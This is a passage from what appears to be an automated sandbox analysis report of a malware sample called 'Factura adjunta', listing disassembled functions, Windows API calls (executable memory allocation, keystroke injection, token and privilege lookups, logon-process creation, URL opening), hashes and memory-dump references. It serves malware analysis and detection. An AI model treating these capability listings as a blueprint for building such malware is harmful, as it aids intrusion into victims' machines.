                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 281cdd71a1360a6bb4a33f183637438ed73240f2bdf33c110cbd2b8b4de810a9
                            • Instruction ID: ca819462b4e101b2c417128e81626c036594e4d647aed56a603eeb6d27360d46
                            • Opcode Fuzzy Hash: 281cdd71a1360a6bb4a33f183637438ed73240f2bdf33c110cbd2b8b4de810a9
                            • Instruction Fuzzy Hash: 02C15D75E0421AEFDB54CF94C884EAEBBB5FF48714B118599E805EB291D730ED81CB90
                            Function 0082E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                            Download Yara Rule
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 0082E3D2
                            • CharLowerBuffW.USER32(?,?), ref: 0082E415
                              • Part of subcall function 0082DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0082DAD9
                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0082E615
                            • _memmove.LIBCMT ref: 0082E628
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: BuffCharLower$AllocVirtual_memmove
                            • String ID:
                            • API String ID: 3659485706-0
                            • Opcode ID: bf0dbb4b6caa8e326820c98008efed04d711a570bd313d1388d17c691ebf59eb
                            • Instruction ID: 33af27e1299902396fc5c97f9083eb6ece7afc8747b35062fca708ab30ee63b8
                            • Opcode Fuzzy Hash: bf0dbb4b6caa8e326820c98008efed04d711a570bd313d1388d17c691ebf59eb
                            • Instruction Fuzzy Hash: 6CC14571A083119FC714DF28C480A6ABBE4FF89318F14896EF999DB351D734E946CB86
                            Function 00806DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Variant$AllocClearCopyInitString
                            • String ID:
                            • API String ID: 2808897238-0
                            • Opcode ID: 8ca6d856b2615a49347410af00c414705b9708bd06381568297879c534c4b2fc
                            • Instruction ID: bf296ea96d8058bae4e21f1e2089436ad44c2d63443e7d1b1cdaf96ffe395f66
                            • Opcode Fuzzy Hash: 8ca6d856b2615a49347410af00c414705b9708bd06381568297879c534c4b2fc
                            • Instruction Fuzzy Hash: F251D530B04706DEDBA0AF69DC95B69B7E5FF48310F20881FE656CB2D1EE34A8509B11
                            Function 0081BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0081BB09
                            • GetLastError.KERNEL32(?,00000000), ref: 0081BB2F
                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0081BB54
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0081BB80
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CreateHardLink$DeleteErrorFileLast
                            • String ID:
                            • API String ID: 3321077145-0
                            • Opcode ID: 92a7a037d972a7da2fd2369ea8cc292da07abf9f42fbb3c808be89000bdea7de
                            • Instruction ID: 9716f15f4743b7a7b9898c70c47b159527695b50ddf9f8a045a9a485b70f3b39
                            • Opcode Fuzzy Hash: 92a7a037d972a7da2fd2369ea8cc292da07abf9f42fbb3c808be89000bdea7de
                            • Instruction Fuzzy Hash: 01412B39600610DFCB11DF15C588A9DBBE5FF89320B098498FA5AAB762CB34FD41CB91
                            Function 00810FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00811037
                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00811053
                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008110B9
                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0081110B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            • Opcode ID: 561601583cfc08415537116d5c641b37baa6e6facf43d8058e82a6519a7c0281
                            • Instruction ID: 8f3c8e73a1775a10e5d3b352d6b8808893e2db8c8f1f4f2deb4a28dc0c79ea42
                            • Opcode Fuzzy Hash: 561601583cfc08415537116d5c641b37baa6e6facf43d8058e82a6519a7c0281
                            • Instruction Fuzzy Hash: 51311630E44A98AAEF308A698C0DBF9BBADFF49310F04425AE681D21D1C77449C49B96
                            Function 00811121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00811176
                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00811192
                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 008111F1
                            • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00811243
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            • Opcode ID: 9def27d258edd527f6597765683be471b0f41c0de5cb0d6c5043b5b3a03e782d
                            • Instruction ID: 54935850153d300dde8e7feea00e7921b5d64018bdb3b1a24b42461f20ed9bcf
                            • Opcode Fuzzy Hash: 9def27d258edd527f6597765683be471b0f41c0de5cb0d6c5043b5b3a03e782d
                            • Instruction Fuzzy Hash: 5431F430A4061CAAEF218A698C0DBFABBAEFF89310F04571AE780D25D1D37449D59795
                            Function 007E6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007E644B
                            • __isleadbyte_l.LIBCMT ref: 007E6479
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007E64A7
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007E64DD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 7059e12ab1692d782ae49eeadffc152e7d2d4f1bf5e22af9fc7758ff8ef4739e
                            • Instruction ID: 19a6e7e515e04372f8ff6165d55dca4b73a66b49764a8d9367df7c6b016da369
                            • Opcode Fuzzy Hash: 7059e12ab1692d782ae49eeadffc152e7d2d4f1bf5e22af9fc7758ff8ef4739e
                            • Instruction Fuzzy Hash: 713101316022CAEFDB218F66C844BAA7FB5FF5A390F154429E854871D1E738DA50DB90
                            Function 00835175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 00835189
                              • Part of subcall function 0081387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00813897
                              • Part of subcall function 0081387D: GetCurrentThreadId.KERNEL32 ref: 0081389E
                              • Part of subcall function 0081387D: AttachThreadInput.USER32(00000000,?,008152A7), ref: 008138A5
                            • GetCaretPos.USER32(?), ref: 0083519A
                            • ClientToScreen.USER32(00000000,?), ref: 008351D5
                            • GetForegroundWindow.USER32 ref: 008351DB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                            • String ID:
                            • API String ID: 2759813231-0
                            • Opcode ID: de76a268e3ca16f8c0172395e0634433267f31bb304ea86c7f4068740b125e30
                            • Instruction ID: f30c580667852b74297c8f2e0401616ad2bc4dd3c0c0277b9d2ba795e5343801
                            • Opcode Fuzzy Hash: de76a268e3ca16f8c0172395e0634433267f31bb304ea86c7f4068740b125e30
                            • Instruction Fuzzy Hash: CF310171D00108AFDB00EFA5C845AEFB7FDEF99300F10446AE515E7251DA759E45CBA1
                            Function 00808B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00808652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00808669
                              • Part of subcall function 00808652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00808673
                              • Part of subcall function 00808652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00808682
                              • Part of subcall function 00808652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00808689
                              • Part of subcall function 00808652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0080869F
                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00808BEB
                            • _memcmp.LIBCMT ref: 00808C0E
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00808C44
                            • HeapFree.KERNEL32(00000000), ref: 00808C4B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                            • String ID:
                            • API String ID: 2182266621-0
                            • Opcode ID: a625e399922f79a9cb0645dd6290f1fced69defb5505a612050021e9a9659078
                            • Instruction ID: 33448d1eae8937994de78db5dd0b016b0837cce8b3af4bc64b9accc8b623018a
                            • Opcode Fuzzy Hash: a625e399922f79a9cb0645dd6290f1fced69defb5505a612050021e9a9659078
                            • Instruction Fuzzy Hash: C6218B71E01208EFDB40DFA4CD49BAEB7B8FF40350F044059E595A7281DB31AA86DBA0
                            Function 007D0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                            Download Yara Rule
                            APIs
                            • __setmode.LIBCMT ref: 007D0BF2
                              • Part of subcall function 007B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00817B20,?,?,00000000), ref: 007B5B8C
                              • Part of subcall function 007B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00817B20,?,?,00000000,?,?), ref: 007B5BB0
                            • _fprintf.LIBCMT ref: 007D0C29
                            • OutputDebugStringW.KERNEL32(?), ref: 00806331
                              • Part of subcall function 007D4CDA: _flsall.LIBCMT ref: 007D4CF3
                            • __setmode.LIBCMT ref: 007D0C5E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                            • String ID:
                            • API String ID: 521402451-0
                            • Opcode ID: 4a51976dfc1ceb3102120b6abf9cd804d4624039e9e9d9e8150362af621dc87e
                            • Instruction ID: 2ef3ec86d8da947b0ebb7691f52166b0cfec141a66aa514412054a1a1f9e8a3c
                            • Opcode Fuzzy Hash: 4a51976dfc1ceb3102120b6abf9cd804d4624039e9e9d9e8150362af621dc87e
                            • Instruction Fuzzy Hash: 1011F371904204EBCB0477A49C4AAFE7B79EF41320F14011BF20897292EE38599147E5
                            Function 00821A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00821A97
                              • Part of subcall function 00821B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00821B40
                              • Part of subcall function 00821B21: InternetCloseHandle.WININET(00000000), ref: 00821BDD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Internet$CloseConnectHandleOpen
                            • String ID:
                            • API String ID: 1463438336-0
                            • Opcode ID: 89940f32652ddb6ab234d284182d269d2720a6a8e10b2dd0ebb7939863d0a0ab
                            • Instruction ID: 2ffe4b525dcd3f06cbfd7a9f70f034af630ea2181582f0598b6bd2962e07ec78
                            • Opcode Fuzzy Hash: 89940f32652ddb6ab234d284182d269d2720a6a8e10b2dd0ebb7939863d0a0ab
                            • Instruction Fuzzy Hash: 6121CF31200624BFDF119F60AC09FBAB7B9FFA4711F20041AFA02D6661EB7198519BA0
                            Function 0080E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0080F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0080E1C4,?,?,?,0080EFB7,00000000,000000EF,00000119,?,?), ref: 0080F5BC
                              • Part of subcall function 0080F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0080F5E2
                              • Part of subcall function 0080F5AD: lstrcmpiW.KERNEL32(00000000,?,0080E1C4,?,?,?,0080EFB7,00000000,000000EF,00000119,?,?), ref: 0080F613
                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0080EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0080E1DD
                            • lstrcpyW.KERNEL32(00000000,?), ref: 0080E203
                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,0080EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0080E237
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: lstrcmpilstrcpylstrlen
                            • String ID: cdecl
                            • API String ID: 4031866154-3896280584
                            • Opcode ID: 07ce2c75b0133966c58d592feb9d25a554fc8594485d87a90039bb7ec34dc4e7
                            • Instruction ID: b0691e6c0dc984c85f5d0729415a46d0c9b4258ffdb08b549e8c11217bdbfc87
                            • Opcode Fuzzy Hash: 07ce2c75b0133966c58d592feb9d25a554fc8594485d87a90039bb7ec34dc4e7
                            • Instruction Fuzzy Hash: 94119036200345EFDB25AF64DC49E7A77B8FF85350B40842AF916CB2A0EB719851D7A1
                            Function 007E5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 007E5351
                              • Part of subcall function 007D594C: __FF_MSGBANNER.LIBCMT ref: 007D5963
                              • Part of subcall function 007D594C: __NMSG_WRITE.LIBCMT ref: 007D596A
                              • Part of subcall function 007D594C: RtlAllocateHeap.NTDLL(00E80000,00000000,00000001), ref: 007D598F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: a0e5d94b57e28f4092953a8bfc14d82a273a558bbd688a839692efb9dc2f0030
                            • Instruction ID: 85d612c14e194f65227d65352eada2920e51b8d6739b6c82b9dc4453826cf711
                            • Opcode Fuzzy Hash: a0e5d94b57e28f4092953a8bfc14d82a273a558bbd688a839692efb9dc2f0030
                            • Instruction Fuzzy Hash: AA11E732506A1DEFCB212F71AC0965D3BA56F183ECF20052BF9459A2A2DF7D89418791
                            Function 007B4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 007B4560
                              • Part of subcall function 007B410D: _memset.LIBCMT ref: 007B418D
                              • Part of subcall function 007B410D: _wcscpy.LIBCMT ref: 007B41E1
                              • Part of subcall function 007B410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007B41F1
                            • KillTimer.USER32(?,00000001,?,?), ref: 007B45B5
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007B45C4
                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007ED6CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                            • String ID:
                            • API String ID: 1378193009-0
                            • Opcode ID: b0224a6710eddfb489de6f649127bc15ebff6ae3851ac32585c32c7721605492
                            • Instruction ID: f8ab1cc6a3e0b22868ea08cb4faaf1d1a60e513bfb35677337405f0788c2d3aa
                            • Opcode Fuzzy Hash: b0224a6710eddfb489de6f649127bc15ebff6ae3851ac32585c32c7721605492
                            • Instruction Fuzzy Hash: DC21C6709057C4AFEB328B24DC59BE7BBECAF05308F04049EE69E56286C7785E94CB51
                            Function 00808AF9 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00808B2A
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00808B31
                            • CloseHandle.KERNEL32(00000004), ref: 00808B4B
                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00808B7A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
